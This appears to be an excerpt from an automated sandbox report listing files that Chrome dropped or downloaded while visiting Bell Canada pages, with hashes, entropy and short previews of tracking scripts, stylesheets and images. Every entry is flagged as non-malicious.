                                                                                                                                                                                                                                                                                                                                      MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                                                                                                                                                                      SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                                                                                                                                                                      SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                                                                                                                                                                      SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):102891
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.249469574193134
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:k+XUraZUvvX56fY7nfzsAYOEbzEQqFFuFAxIzAW9UgBqd1WoXdBQ0HzTjJYmStPN:leX5RfoF9UgU2yL0tv/Dnjd
                                                                                                                                                                                                                                                                                                                                      MD5:1EABC9C3DAA01B5F0054992A921EC8E0
                                                                                                                                                                                                                                                                                                                                      SHA1:6414100789D932C26B8A6A66164E99B4599E7BE2
                                                                                                                                                                                                                                                                                                                                      SHA-256:DC30DF00A881A6090D203E044486BAC114B35C65882ED3F13017E75A390EB132
                                                                                                                                                                                                                                                                                                                                      SHA-512:1CA3FFB4463FE06980054929FEDB93EF218961F51E2DBF972FF8A294C605FFF3715A930415268BF1AAFAC4D8D974D442B5DA33F21449C707540ACE3C74A0F4EB
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:window.Modernizr=function(n,t,i){function a(n){c.cssText=n}function vt(n,t){return a(y.join(n+";")+(t||""))}function h(n,t){return typeof n===t}function v(n,t){return!!~(""+n).indexOf(t)}function lt(n,t){var u,r;for(u in n)if(r=n[u],!v(r,"-")&&c[r]!==i)return t=="pfx"?r:!0;return!1}function yt(n,t,r){var f,u;for(f in n)if(u=t[n[f]],u!==i)return r===!1?n[f]:h(u,"function")?u.bind(r||t):u;return!1}function f(n,t,i){var r=n.charAt(0).toUpperCase()+n.slice(1),u=(n+" "+ot.join(r+" ")+r).split(" ");return h(t,"string")||h(t,"undefined")?lt(u,t):(u=(n+" "+st.join(r+" ")+r).split(" "),yt(u,t,i))}function pt(){u.input=function(i){for(var r=0,u=i.length;r<u;r++)w[i[r]]=!!(i[r]in o);return w.list&&(w.list=!!(t.createElement("datalist")&&n.HTMLDataListElement)),w}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" "));u.inputtypes=function(n){for(var u=0,r,f,e,h=n.length;u<h;u++)o.setAttribute("type",f=n[u]),r=o.type!=="text",r&&(o.value=g,o.style.cssText="pos
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):289064
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.560106146269531
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:+IwiztGbET0a0ocy045CptDY8/I8+yU/OUYhcDm6DcM8Gp/9Lp:PGbgT0ovMYGUT9cM8Gp/9t
                                                                                                                                                                                                                                                                                                                                      MD5:4914472401847F011B7D5562BE6947A0
                                                                                                                                                                                                                                                                                                                                      SHA1:CB2B00B88CF1539FC5B2727FCB2AF132FDA0423D
                                                                                                                                                                                                                                                                                                                                      SHA-256:77D080EFCDDA7CB259CFE17EF0A7FE1642C0A8F0B443DAC3E458E882111B40EA
                                                                                                                                                                                                                                                                                                                                      SHA-512:AAD3EA780E2A36EB49ED3C65DF5154E3D785C746977195DE8E27919AAF19C7466EAE4024CD1804963CEDE8289BA505449FDEB1C94F63BD1983B5E293FFFD26F0
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDesusertionId":"AW-953414520","tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_isManualEnabled":false,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAdd
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (13876)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):344099
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.604896816372018
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:p4HQGbgBuzoIk2639cM8Gp/F2wVtu9BW24nOw:iH9cuzoIyVAED
                                                                                                                                                                                                                                                                                                                                      MD5:B6E0C856BFF460F1C6E78B5D4F131A4C
                                                                                                                                                                                                                                                                                                                                      SHA1:6ABD49E893C5239EE6AAC42336FFA882486593DA
                                                                                                                                                                                                                                                                                                                                      SHA-256:FD9A75B9732AE391086BE2CA284045C11820267DC896C7EC8FE96F2179FB7A62
                                                                                                                                                                                                                                                                                                                                      SHA-512:E2E8D22CC908D99B6322A8C1EAFD6919FDB864158F5848300BAD8CB5C09957AFEF71B900B9EFCFEBBB8B1D2757B012E733E3962971927A13730F117AA0B19F55
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":107},{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":1,"vtp_paramValue":"internal","vtp_ruleResult":["macro",2],"tag_id":109},{"function":"__ogt_dma","priority":29,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":110},{"function":"__ogt_1p_data_v2","priority":29,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailTy
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.543942707918268
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:UC0sRsRivRs+1:UceRYKY
                                                                                                                                                                                                                                                                                                                                      MD5:B9A2C07210E28E692EEF794D7172FBB7
                                                                                                                                                                                                                                                                                                                                      SHA1:E8A36EE8241F8D69DEAB26ED2AD050769A03794E
                                                                                                                                                                                                                                                                                                                                      SHA-256:6242468BAAE3489786B684C0C64FD532FEDB556C08EF92D820D751C06EFF43E7
                                                                                                                                                                                                                                                                                                                                      SHA-512:967D5B9769908817FC75E8288CCD8B64A7AEBC828A02647CDC4408B28A581876D53D6CEB0F4C945CD0B176EE9EE58B229D00E00EADE5679B54BCA709BB4C7691
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwk4tdR_Fw6MQxIFDWdns_4SBQ3h5tTW?alt=proto
                                                                                                                                                                                                                                                                                                                                      Preview:ChoKCw1nZ7P+GgQIIxgBCgsN4ebU1hoECCIYAQ==
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (33379), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):33379
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1065918509650805
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:GKqZzz8X21jF2Vn8LJMurwD+l4hj+zIOGWsWEawZq2xyDHgLX/jg:eL3+n1EwDvrPWs+2qF
                                                                                                                                                                                                                                                                                                                                      MD5:41F4301D02B2889FB4D8A8067F350768
                                                                                                                                                                                                                                                                                                                                      SHA1:5CD52BAD684A3D554B40C2D56953EE69C473B3A0
                                                                                                                                                                                                                                                                                                                                      SHA-256:F4AF2A9C01F60CAF9FEFCA07A215E65AAEBB13A3144FE6E21DC4B9B1C18480E7
                                                                                                                                                                                                                                                                                                                                      SHA-512:71CD9E96B39E5310946AE5D1456CAAAEE888910208BADEB2B078A4D9955C18110B46DEB05632CAC4ED9954DA612CB2B35D56E03775A5E66514E48074251F2729
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/BRF3/core/js/connector.js?ver=202410201639
                                                                                                                                                                                                                                                                                                                                      Preview:var BELL = function (e) { return e.gConnector.utils = { cookieManager: { setLanguageRegionCookieValue: function (e, t, n, o) { var i = "gemini", a = 1 == o ? null : BELL.gConnector.utils.cookieManager.getCookie(i), c = BELL.gConnector.utils.cookieManager.getGeminiString(e, t, a, n), l = ".bell.ca"; window.location.hostname.toLowerCase().indexOf("virginmobile.ca") > -1 && (l = ".virginmobile.ca"), BELL.gConnector.utils.cookieManager.setCookie(i, c, 90, l) }, getGeminiString: function (e, t, n, o) { var i = "region=" + t + "|language=" + e + "|province=" + t + "|LarSegmentType=" + o; if (null != n) { var a = n.split("|"); null != t && 0 != t.length && (a[0] = "region=" + t, a[2] = "province=" + t), null != e && 0 != e.length && (a[1] = "language=" + e), null != o && null != o && 0 != o.length && (a[3] = "LarSegmentType=" + o), i = a[0] + "|" + a[1] + "|" + a[2] + "|" + a[3] } return i }, getCookie: function (e) { var t = ("; " + document.cookie).split("; " + e + "="); if (2 == t.length)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 240 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7907
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.947412513798188
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:rRXhvxZhqdhZZ5/Wfcy1qaHMVcHdDO/10HS2NHEN:r7hOhZr/+cy1qLVc9DO2yYm
                                                                                                                                                                                                                                                                                                                                      MD5:EFE64EF48AE8980C86FB4CFB9AEC6FD0
                                                                                                                                                                                                                                                                                                                                      SHA1:3A270C8AB964E2F74973ED336DFCD79D8C97100E
                                                                                                                                                                                                                                                                                                                                      SHA-256:F0E4FE9C3B9F9AAE87912311237C02FD408F7904B50679761968811574ABC664
                                                                                                                                                                                                                                                                                                                                      SHA-512:701225889C5C3FED5B604F0420AC2D65D3E21AF23F07FC1AF4FE67EB80D48149979A329737F8861E02B638DB7E3981590C6AEBCFFA6635245E737EB46BC742A6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......P.....'I.|....gAMA......a....8eXIfMM.*.......i......................................P.......g...VIDATx....fS....Mb.I...L...E%*..6..(.u.2D.B....."{.G.l-.i.."3-.d............;.f...y.{.g...9.y.3-t..(&N=......~3...G.V.o..&..1.1....M+.....M:_..b]/........x.+_..k.U7.).7..........y..g...u.....u.].n..........1.1..."....VZ)....~.._YR.|..NZf.e..!_V.HNj...O.TD.P..7.tS.....~._....,.n&....2c...X~....k.....'..7.8....A.|.~.....!.63..O<....P.&.:. b...rKZ._g.d.....n.ax....f..!...x[........M..."/\.0\r.%>o>.....2....]w.5...|.c.......f.@..._..fb......3m.}......V>f.d.........0g...>t..s./...[w....SNY^.#o....................c.A.G.........5.nl]..,....V.<.+.....c.@...`.e.'?......f......i3..!c c`<1...&..G?.s.t.I.p2!.yC.g.*...I.1.10..8..s.g..dB..&....!c c`.1....6.z..0.-..\a..!c c`.1....0k.6.3.r]{mW...~........F/{.i..<!...n..l.|.y..1.....Vt.:,.L..2d.d..;0`...wu..+.................]..z:...K..dv.=[F.T...j.={v...(.o..*.......Z......i..BO
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.92586884922945
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREjfMyqXXl6EWP1CSHI:UrXiGlqX1eRo
                                                                                                                                                                                                                                                                                                                                      MD5:D0D6C7E1BF397BA72E37A05F209D35BD
                                                                                                                                                                                                                                                                                                                                      SHA1:AEC1844CBE41ED28DE2B09E3F8C03EC714B7217D
                                                                                                                                                                                                                                                                                                                                      SHA-256:4526C470CE87CFC18A57F7C4EE7F4772329BA42B6BCAAE04B32F525400FE4AB7
                                                                                                                                                                                                                                                                                                                                      SHA-512:0C8F988CD57074A6B31AEA79B3DB797DD52EA3C04B38C756CDD74CB7C3CDA8EBF369D785C0892A20ADB39BE7398177E4EC082FB834AB497E98F4ACE361757CB2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__6 === 'function' && branch_callback__6("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):353110
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.418038120576255
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:8JV0N1lfYs/tZoZjNPjn+A1MJsmcnuuPITeddzhca68RsBWeuU+VufG9ZmkXB+il:8JVotra8A1MGm8uuwTeTia68Rsse2A8
                                                                                                                                                                                                                                                                                                                                      MD5:D11C31961B2F1A4819D7A2EFB9C7232B
                                                                                                                                                                                                                                                                                                                                      SHA1:42321C1A40A003A52EA7E9024826E3477E0C43D4
                                                                                                                                                                                                                                                                                                                                      SHA-256:E59685C749B3371CB179B9B671415513A21B3024AB9E7FE98622A09400950BAD
                                                                                                                                                                                                                                                                                                                                      SHA-512:73AA831541793D06A808D8AE0C3DC8F12B7213375CD2ED0526EB831C7E71E619D297235BA8F970756BA11C826336B2DEE1415A84FD256D4DF2C8FD9E47EB1C6D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://analytics.tiktok.com/i18n/pixel/static/main.MTJhNGMzN2YwNA.js
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (63002), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):63014
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.995187439982916
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:+vWqhjHoAMN3SuxkNeM8+UPn7wpzGhCtc0hhm60BFcg5KTMnXj3xqQnyjxxJOhhD:+vWqrc0h46krKq
                                                                                                                                                                                                                                                                                                                                      MD5:AB9B277928FF7F6D3006EDD241948B6E
                                                                                                                                                                                                                                                                                                                                      SHA1:4991DFE9BDDEE286D065B491C521465A8F7E7BB7
                                                                                                                                                                                                                                                                                                                                      SHA-256:7C50C3C2439FF3EAD384866DE213B31925825D3F79CE08456E2F7CF1E058210E
                                                                                                                                                                                                                                                                                                                                      SHA-512:4C6179F98759AB1D56F56F52A0F66D487EFCE4257093201D569F95B1C8A76C7A8C54E484B3BAE15B0FE945BC8CC7E9BF8F132EA4362746E83610C7DE1647676A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/core/css/brfcore.css?v=zbi3RuwbS6bRcUkcoUckU7V_IHu8qZcyWpXr9QxiAMQ1
                                                                                                                                                                                                                                                                                                                                      Preview:.slick-slider{position:relative;display:block;box-sizing:border-box;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-touch-callout:none;-khtml-user-select:none;-ms-touch-action:pan-y;touch-action:pan-y;-webkit-tap-highlight-color:transparent}.slick-list{position:relative;display:block;overflow:hidden;margin:0;padding:5px}.slick-list:focus{outline:none}.slick-list.dragging{cursor:pointer;cursor:hand}.slick-slider .slick-track,.slick-slider .slick-list{-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.slick-track{position:relative;top:0;left:0;display:block}.slick-track:before,.slick-track:after{display:table;content:''}.slick-track:after{clear:both}.slick-loading .slick-track{visibility:hidden}[dir='rtl'] .slick-slide{float:right}.slick-slide img{display:block}.slick-slide.slick-loading img{display:none}.slick-slide.dragging img{
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1925825200734
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YXLfcglsW0GxoW/eYJzAXWMSIp24brEJ4:YaixoW/9FMSUrZ
                                                                                                                                                                                                                                                                                                                                      MD5:3944D2F4EF92AF425D5A341E3D40D7A8
                                                                                                                                                                                                                                                                                                                                      SHA1:4392645F29C17DED10D16622BA237CE690224FD9
                                                                                                                                                                                                                                                                                                                                      SHA-256:9369B2673DB55DE20067C87D7BE63F4197A69C3236D0A1C108000B938594B9DF
                                                                                                                                                                                                                                                                                                                                      SHA-512:D233DEE1FBC2143015BB77156AF6BA35D64FDF634A08F69EE7DB092282AA540ADEE892E00CE2C136D004FF7BC262D485D07B16872198790B5FA1E4EA57E4A8CA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:{"reason":"Invalid arguments","events_count":"0","results":{},"version":"5","status":false}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRE9yqXXl6Egd61CSHI:UrXiLqX148Ro
                                                                                                                                                                                                                                                                                                                                      MD5:972567C9D116F8E0DEB971042D678AD9
                                                                                                                                                                                                                                                                                                                                      SHA1:385D9E7A41010C460C126A52430D4983D8950422
                                                                                                                                                                                                                                                                                                                                      SHA-256:6A58AE034BF84F8C5EAEA6E3B6771D9C1531CFC441D237BCCE39D71A2CF208C6
                                                                                                                                                                                                                                                                                                                                      SHA-512:9A808DCA5E914B52A744A013C8917EB7E2790F0D180FAB274951B61063AD0EEF492A019442598AD74C066C09361FF988E7D5D79E61848E7DA70CEAC3F0D176C3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__3 === 'function' && branch_callback__3("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 430x290, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):12690
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.884145620947392
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:DXji43uwhrMo+jUgJvM+FSQB/qeg4fzr5x+nlQ92:64+R/jfvMO7fv3+lw2
                                                                                                                                                                                                                                                                                                                                      MD5:A66F1A71245272EF47B3FB6E5C3C9835
                                                                                                                                                                                                                                                                                                                                      SHA1:1F2D2E92FA99E4C169A72E815BEFC262B37C1DD6
                                                                                                                                                                                                                                                                                                                                      SHA-256:3DA0A9F0C5D3821AAA894C3EBF0793E06364A8CBA038B1DF3764FE90B200817B
                                                                                                                                                                                                                                                                                                                                      SHA-512:46B69264BBB44249CD59EBD85A58504FB7C5BEB6CC564D382434F5639F89F390E2A0AFEEAF398897D62FC6D4A5E15069194850B54164621976541A612BFE305E
